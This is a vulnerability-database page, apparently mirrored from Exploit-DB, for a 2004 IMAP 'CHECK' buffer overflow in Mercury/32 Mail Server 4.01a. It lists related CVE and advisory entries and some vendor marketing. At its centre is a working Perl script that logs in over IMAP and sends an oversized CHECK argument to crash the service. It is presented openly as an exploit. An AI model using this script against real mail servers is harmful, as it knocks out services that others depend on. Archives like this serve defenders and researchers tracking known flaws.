Lucene search
+L

Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow

🗓️ 01 Dec 2004 00:00:00Reported by Reed ArvinType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 104 Views

Mercury/32 Mail Server 4.01a vulnerable to buffer overflow via IMAP4 'check' command exploit.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
Mercury Mail Remote IMAP Stack Buffer Overflow (deprecated)
30 Nov 200400:00
nessus
nessus
Tenable Nessus
Mercury Mail Remote IMAP Server Remote Overflow
30 Nov 200400:00
nessus
circl
Circl
CVE-2004-1211
9 May 201000:00
circl
checkpoint_advisories
Check Point Advisories
Preemptive Protection against Mercury Mail IMAP Buffer Overflow Vulnerability
11 Apr 200700:00
checkpoint_advisories
cve
CVE
CVE-2004-1211
15 Dec 200405:00
cve
cve
CVE
CVE-2004-2513
25 Oct 200504:00
cve
cvelist
Cvelist
CVE-2004-1211
15 Dec 200405:00
cvelist
cvelist
Cvelist
CVE-2004-2513
25 Oct 200504:00
cvelist
exploitdb
Exploit DB
Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)
9 May 201000:00
exploitdb
exploitdb
Exploit DB
Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow
24 Mar 200700:00
exploitdb
Rows per page
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl <ip> <imap4 user> <imap4 pass>
#        Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
#############################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto    => "TCP"))
{
        print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";

        sleep(1);

        print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";

        sleep(1);

        print $socket "0001 CHECK " . "A" x 512 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====

# milw0rm.com [2004-12-01]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 May 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.72459
104